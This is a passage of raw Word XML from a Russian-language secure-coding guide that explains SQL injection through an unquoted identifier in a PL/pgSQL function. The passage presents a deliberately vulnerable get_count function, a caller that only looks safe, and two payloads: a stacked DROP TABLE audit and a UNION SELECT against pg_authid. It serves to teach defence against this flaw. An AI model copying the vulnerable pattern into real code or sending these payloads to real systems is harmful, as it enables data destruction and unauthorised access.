        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-- USAGE на функцию выдан application-роли через GRANT EXECUTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB7B599" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE5878" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4254BBAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS bigint LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0ABA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5C3F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result bigint;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2AB6B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B04CDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- АНТИПАТТЕРН: %s для identifier-имени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681B7F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %s', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497A637B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774731BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BE127" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57093F5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D043A7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- GRANT EXECUTE ON FUNCTION app.get_count(text) TO application_role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C02873" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как есть — без quoting, без escape. Application-роль вызывает через bind-параметризацию (что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не защищает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что injection уже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> функции):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC81E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/stats.py — caller выглядит "безопасно"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FF7EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/stats/count")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E86E861" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_count(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DD4BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str = Query(...),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427281C"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6D3A7EA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819CD9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Безопасный bind для функции, но функция уязвима</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F21778" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327B0DD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.get_count(:tbl)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CDDFBF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"tbl": table},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D6D8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C302817" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {"count": result.scalar()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7ED5D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — stacked injection через identifier-position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DE90FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /stats/count?table=users%3B%20DROP%20TABLE%20audit%3B%20--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D2BBA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table = "users; DROP TABLE audit; --"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bind-параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сохраняет строку как есть</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не injection в SQL. Но функция получает её и подставляет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s', ...)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33550B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5242A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('SELECT COUNT(*) FROM %s', 'users; DROP TABLE audit; --');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D35788" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Эквивалентно:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD1E10A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT COUNT(*) FROM users; DROP TABLE audit; --';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B2EDF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EXECUTE в plpgsql парсит multi-statement по `;` всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отдельный канал</w:t>
      </w:r>
      <w:r>
        <w:t>, не зависящий от Wire Protocol (см. ниже «Почему»). Сервер видит и исполняет:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5ED798" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT COUNT(*) FROM users;     -- первая команда — даёт result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081C008" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DROP TABLE audit;                -- вторая команда — destructive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0C1CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Результат: count возвращается (app-side не подозревает), таблица </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> удалена. Если функция SECURITY DEFINER (см. 3.16.5), DROP исполняется под superuser-привилегиями — даже если caller не имеет DROP-прав.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2407DFF1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернативный payload — SELECT-injection без DROP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26EDCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /stats/count?table=users%20UNION%20SELECT%20(SELECT%20count(*)%20FROM%20pg_authid)--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397DB5BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table = "users UNION SELECT (SELECT count(*) FROM pg_authid)--"</w:t>
      </w:r>
      <w:r>
        <w:t>. Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B17BC3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTE 'SELECT COUNT(*) FROM users UNION SELECT (SELECT count(*) FROM pg_authid)--';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E59D7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если caller-роль не имеет SELECT на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (обычно так), вернётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Но если функция SECURITY DEFINER и owner — superuser, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> count возвращается как result — атакующий вычислил количество ролей в системе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7A058" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (полный SQL контекст):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2F4B4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068B910" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT app.get_count('users; DROP TABLE audit; --');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9090D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110CBCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- В plpgsql функции (внутренняя EXECUTE-trace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C66D5D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT COUNT(*) FROM users; DROP TABLE audit; --';</w:t>
      </w:r>
    </w:p>
